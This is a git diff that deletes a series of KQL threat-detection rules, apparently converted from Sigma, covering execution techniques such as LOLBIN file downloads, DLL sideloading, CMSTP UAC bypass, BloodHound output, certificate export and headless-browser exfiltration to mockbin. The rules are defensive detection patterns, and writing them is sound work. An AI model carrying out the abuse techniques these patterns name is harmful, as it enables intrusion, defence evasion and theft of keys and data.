-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql b/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql
deleted file mode 100644
index 51893a0d..00000000
--- a/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/11
-// Level: high
-// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
-// Tags: attack.execution, attack.t1059
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql b/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index 354e0360..00000000
--- a/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: medium
-// Description: Detects Kerberos DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\kerberos.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql b/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index fb608553..00000000
--- a/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: medium
-// Description: Detects DSParse DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath contains "\\dsparse.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/Add_Insecure_Download_Source_To_Winget.kql b/Execution/Add_Insecure_Download_Source_To_Winget.kql
deleted file mode 100644
index 65afca78..00000000
--- a/Execution/Add_Insecure_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects usage of winget to add a new insecure (http) download source.
-Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Execution/Add_New_Download_Source_To_Winget.kql b/Execution/Add_New_Download_Source_To_Winget.kql
deleted file mode 100644
index cc0181f1..00000000
--- a/Execution/Add_New_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new additional download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql b/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
deleted file mode 100644
index 2fc70f43..00000000
--- a/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new potentially suspicious download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}"
\ No newline at end of file
diff --git a/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql b/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql
deleted file mode 100644
index bc9b3253..00000000
--- a/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Application_Removed_Via_Wmic.EXE.kql b/Execution/Application_Removed_Via_Wmic.EXE.kql
deleted file mode 100644
index 4ef64bab..00000000
--- a/Execution/Application_Removed_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/28
-// Level: medium
-// Description: Uninstall an application with wmic
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "call" or ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Application_Terminated_Via_Wmic.EXE.kql b/Execution/Application_Terminated_Via_Wmic.EXE.kql
deleted file mode 100644
index e0c3848d..00000000
--- a/Execution/Application_Terminated_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/11
-// Level: medium
-// Description: Detects calls to the "terminate" function via wmic in order to kill an application
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql b/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql
deleted file mode 100644
index efb673dc..00000000
--- a/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/10
-// Level: medium
-// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables
-// Tags: attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\")))
\ No newline at end of file
diff --git a/Execution/Arbitrary_Command_Execution_Using_WSL.kql b/Execution/Arbitrary_Command_Execution_Using_WSL.kql
deleted file mode 100644
index caf25951..00000000
--- a/Execution/Arbitrary_Command_Execution_Using_WSL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql b/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
deleted file mode 100644
index 124d7a9b..00000000
--- a/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: high
-// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
deleted file mode 100644
index f28e5897..00000000
--- a/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
deleted file mode 100644
index 03309431..00000000
--- a/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSOHTMED" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql
deleted file mode 100644
index 6f5fc727..00000000
--- a/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql b/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
deleted file mode 100644
index 3f3dd72d..00000000
--- a/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql b/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql
deleted file mode 100644
index b4580a08..00000000
--- a/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql b/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
deleted file mode 100644
index 8441648d..00000000
--- a/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql b/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
deleted file mode 100644
index c2a5c681..00000000
--- a/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
-// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql b/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql
deleted file mode 100644
index 76fa5460..00000000
--- a/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/14
-// Level: medium
-// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
-
-// Tags: attack.execution
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll")
\ No newline at end of file
diff --git a/Execution/Base64_MZ_Header_In_CommandLine.kql b/Execution/Base64_MZ_Header_In_CommandLine.kql
deleted file mode 100644
index ab64782f..00000000
--- a/Execution/Base64_MZ_Header_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: high
-// Description: Detects encoded base64 MZ header in the commandline
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA"
\ No newline at end of file
diff --git a/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql b/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
deleted file mode 100644
index 75e530fc..00000000
--- a/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jimmy Bayne (@bohops)
-// Date: 2024/01/02
-// Level: medium
-// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/Execution/BloodHound_Collection_Files.kql b/Execution/BloodHound_Collection_Files.kql
deleted file mode 100644
index 2dd9a6ed..00000000
--- a/Execution/BloodHound_Collection_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: C.J. May
-// Date: 2022/08/09
-// Level: high
-// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
-DeviceFileEvents
-| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/Execution/Blue_Mockingbird_-_Registry.kql b/Execution/Blue_Mockingbird_-_Registry.kql
deleted file mode 100644
index 8d23eb90..00000000
--- a/Execution/Blue_Mockingbird_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick (@tliffick)
-// Date: 2020/05/14
-// Level: high
-// Description: Attempts to detect system changes made by Blue Mockingbird
-// Tags: attack.execution, attack.t1112, attack.t1047
-DeviceRegistryEvents
-| where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"
\ No newline at end of file
diff --git a/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql b/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql
deleted file mode 100644
index db543222..00000000
--- a/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: medium
-// Description: Detects CLR DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/CMSTP_Execution_Process_Creation.kql b/Execution/CMSTP_Execution_Process_Creation.kql
deleted file mode 100644
index 32254f8e..00000000
--- a/Execution/CMSTP_Execution_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/Execution/CMSTP_Execution_Registry_Event.kql b/Execution/CMSTP_Execution_Registry_Event.kql
deleted file mode 100644
index fc5cd431..00000000
--- a/Execution/CMSTP_Execution_Registry_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey contains "\\cmmgr32.exe"
\ No newline at end of file
diff --git a/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
deleted file mode 100644
index b950101f..00000000
--- a/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019/07/31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Execution/CSExec_Service_File_Creation.kql b/Execution/CSExec_Service_File_Creation.kql
deleted file mode 100644
index 84508a03..00000000
--- a/Execution/CSExec_Service_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/04
-// Level: medium
-// Description: Detects default CSExec service filename which indicates CSExec service installation and execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith "\\csexecsvc.exe"
\ No newline at end of file
diff --git a/Execution/Certificate_Exported_Via_PowerShell.kql b/Execution/Certificate_Exported_Via_PowerShell.kql
deleted file mode 100644
index 3d1a911f..00000000
--- a/Execution/Certificate_Exported_Via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
-// Tags: attack.credential_access, attack.execution, attack.t1552.004, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql b/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql
deleted file mode 100644
index 51b9c6c2..00000000
--- a/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/01
-// Level: medium
-// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ")
\ No newline at end of file
diff --git a/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql b/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql
deleted file mode 100644
index 63468599..00000000
--- a/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/09/11
-// Level: high
-// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin")
\ No newline at end of file
diff --git a/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql b/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql
deleted file mode 100644
index b601c089..00000000
--- a/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/23
-// Level: high
-// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
-This could be a sign of obfuscation of a fat finger problem (typo by the developer).
-
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /r "))))
\ No newline at end of file
